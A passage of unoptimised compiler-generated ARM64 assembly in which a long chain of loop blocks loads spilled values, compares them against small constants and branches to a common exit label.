tbnz w8, #0, LBB1_693
b LBB1_318
LBB1_318: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_321
b LBB1_319
LBB1_319: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #8
cset w8, ne
tbnz w8, #0, LBB1_321
b LBB1_320
LBB1_320: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #168] ; 8-byte Folded Reload
ldr x8, [sp, #712] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_321
LBB1_321: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_325
b LBB1_322
LBB1_322: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #168] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_325
b LBB1_323
LBB1_323: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #8
cset w8, ne
tbnz w8, #0, LBB1_325
b LBB1_324
LBB1_324: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #712] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_325
LBB1_325: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #800] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_327
b LBB1_326
LBB1_326: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-184] ; 8-byte Folded Reload
ldr x8, [sp, #488] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_329
b LBB1_327
LBB1_327: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #248] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_329
b LBB1_328
LBB1_328: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #792] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_329
LBB1_329: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #248] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_331
b LBB1_330
LBB1_330: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #792] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_332
b LBB1_331
LBB1_331: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #488] ; 8-byte Folded Reload
ldur x8, [x29, #-184] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_332
LBB1_332: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #792] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_334
b LBB1_333
LBB1_333: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #256] ; 8-byte Folded Reload
ldr x8, [sp, #800] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_334
LBB1_334: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #248] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_337
b LBB1_335
LBB1_335: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #792] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_337
b LBB1_336
LBB1_336: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #800] ; 8-byte Folded Reload
ldur x8, [x29, #-184] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_337
LBB1_337: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #248] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_341
b LBB1_338
LBB1_338: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_341
b LBB1_339
LBB1_339: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_341
b LBB1_340
LBB1_340: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #792] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_341
LBB1_341: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #248] ; 8-byte Folded Reload
ldr x8, [sp, #792] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_346
b LBB1_342
LBB1_342: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_345
b LBB1_343
LBB1_343: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_345
b LBB1_344
LBB1_344: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #792] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_346
b LBB1_345
LBB1_345: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_346
LBB1_346: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_349
b LBB1_347
LBB1_347: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #9
cset w8, ne
tbnz w8, #0, LBB1_349
b LBB1_348
LBB1_348: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #248] ; 8-byte Folded Reload
ldr x8, [sp, #792] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_349
LBB1_349: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_353
b LBB1_350
LBB1_350: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #248] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_353
b LBB1_351
LBB1_351: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #9
cset w8, ne
tbnz w8, #0, LBB1_353
b LBB1_352
LBB1_352: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #792] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_353
LBB1_353: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #840] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_355
b LBB1_354
LBB1_354: ; in Loop: Header=BB1_70 Depth=1
ldur x9, [x29, #-152] ; 8-byte Folded Reload
ldr x8, [sp, #528] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_357
b LBB1_355
LBB1_355: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #272] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_357
b LBB1_356
LBB1_356: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #816] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_357
LBB1_357: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #272] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_359
b LBB1_358
LBB1_358: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #816] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_360
b LBB1_359
LBB1_359: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #528] ; 8-byte Folded Reload
ldur x8, [x29, #-152] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_360
LBB1_360: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #816] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_362
b LBB1_361
LBB1_361: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #296] ; 8-byte Folded Reload
ldr x8, [sp, #840] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_362
LBB1_362: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #272] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_365
b LBB1_363
LBB1_363: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #816] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_365
b LBB1_364
LBB1_364: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #840] ; 8-byte Folded Reload
ldur x8, [x29, #-152] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_365
LBB1_365: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #272] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_369
b LBB1_366
LBB1_366: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_369
b LBB1_367
LBB1_367: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_369
b LBB1_368
LBB1_368: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #816] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_369
LBB1_369: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #272] ; 8-byte Folded Reload
ldr x8, [sp, #816] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_374
b LBB1_370
LBB1_370: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_373
b LBB1_371
LBB1_371: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_373
b LBB1_372
LBB1_372: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #816] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_374
b LBB1_373
LBB1_373: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #10
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_374
LBB1_374: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_377
b LBB1_375
LBB1_375: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB1_377
b LBB1_376
LBB1_376: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #272] ; 8-byte Folded Reload
ldr x8, [sp, #816] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_377
LBB1_377: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_381
b LBB1_378
LBB1_378: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #272] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_381
b LBB1_379
LBB1_379: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #10
cset w8, ne
tbnz w8, #0, LBB1_381
b LBB1_380
LBB1_380: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #816] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_381
LBB1_381: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #880] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_383
b LBB1_382
LBB1_382: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #832] ; 8-byte Folded Reload
ldr x8, [sp, #288] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_385
b LBB1_383
LBB1_383: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #312] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_385
b LBB1_384
LBB1_384: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #856] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_385
LBB1_385: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #312] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_387
b LBB1_386
LBB1_386: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #856] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_388
b LBB1_387
LBB1_387: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #288] ; 8-byte Folded Reload
ldr x8, [sp, #832] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_388
LBB1_388: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #856] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_390
b LBB1_389
LBB1_389: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #336] ; 8-byte Folded Reload
ldr x8, [sp, #880] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_390
LBB1_390: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #312] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_393
b LBB1_391
LBB1_391: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #856] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_393
b LBB1_392
LBB1_392: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #880] ; 8-byte Folded Reload
ldr x8, [sp, #832] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_393
LBB1_393: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #312] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_397
b LBB1_394
LBB1_394: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_397
b LBB1_395
LBB1_395: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_397
b LBB1_396
LBB1_396: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #856] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_397
LBB1_397: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #312] ; 8-byte Folded Reload
ldr x8, [sp, #856] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_402
b LBB1_398
LBB1_398: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_401
b LBB1_399
LBB1_399: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_401
b LBB1_400
LBB1_400: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #856] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_402
b LBB1_401
LBB1_401: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #11
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_402
LBB1_402: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, eq
tbnz w8, #0, LBB1_405
b LBB1_403
LBB1_403: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #11
cset w8, ne
tbnz w8, #0, LBB1_405
b LBB1_404
LBB1_404: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #312] ; 8-byte Folded Reload
ldr x8, [sp, #856] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
and w8, w8, #0x1
ldrsb w9, [x9]
subs w9, w9, #0
cset w9, ne
and w9, w9, #0x1
subs w8, w8, w9
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_405
LBB1_405: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #512] ; 8-byte Folded Reload
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
adds w8, w8, #1
cset w8, eq
tbnz w8, #0, LBB1_409
b LBB1_406
LBB1_406: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #312] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_409
b LBB1_407
LBB1_407: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #680] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #11
cset w8, ne
tbnz w8, #0, LBB1_409
b LBB1_408
LBB1_408: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #856] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_409
LBB1_409: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #920] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_411
b LBB1_410
LBB1_410: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #872] ; 8-byte Folded Reload
ldr x8, [sp, #328] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB1_413
b LBB1_411
LBB1_411: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #352] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_413
b LBB1_412
LBB1_412: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #896] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_413
LBB1_413: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #352] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_415
b LBB1_414
LBB1_414: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #896] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_416
b LBB1_415
LBB1_415: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #328] ; 8-byte Folded Reload
ldr x8, [sp, #872] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_416
LBB1_416: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #896] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_418
b LBB1_417
LBB1_417: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #376] ; 8-byte Folded Reload
ldr x8, [sp, #920] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w10, [x9]
mov w9, #-1
mul w9, w9, w10
add w8, w8, w9
subs w8, w8, #1
cset w8, ne
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_418
LBB1_418: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #352] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_421
b LBB1_419
LBB1_419: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #896] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
tbnz w8, #0, LBB1_421
b LBB1_420
LBB1_420: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #920] ; 8-byte Folded Reload
ldr x8, [sp, #872] ; 8-byte Folded Reload
ldr w8, [x8]
ldr w9, [x9]
subs w8, w8, w9
cset w8, gt
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_421
LBB1_421: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #352] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_425
b LBB1_422
LBB1_422: ; in Loop: Header=BB1_70 Depth=1
ldur x8, [x29, #-112] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #22
cset w8, ne
tbnz w8, #0, LBB1_425
b LBB1_423
LBB1_423: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #512] ; 8-byte Folded Reload
ldr w8, [x8]
subs w8, w8, #0
cset w8, ne
tbnz w8, #0, LBB1_425
b LBB1_424
LBB1_424: ; in Loop: Header=BB1_70 Depth=1
ldr x8, [sp, #896] ; 8-byte Folded Reload
ldrsb w8, [x8]
subs w8, w8, #0
cset w8, eq
mov w9, #0
str w9, [sp, #20] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_693
b LBB1_425
LBB1_425: ; in Loop: Header=BB1_70 Depth=1
ldr x9, [sp, #352] ; 8-byte Folded Reload
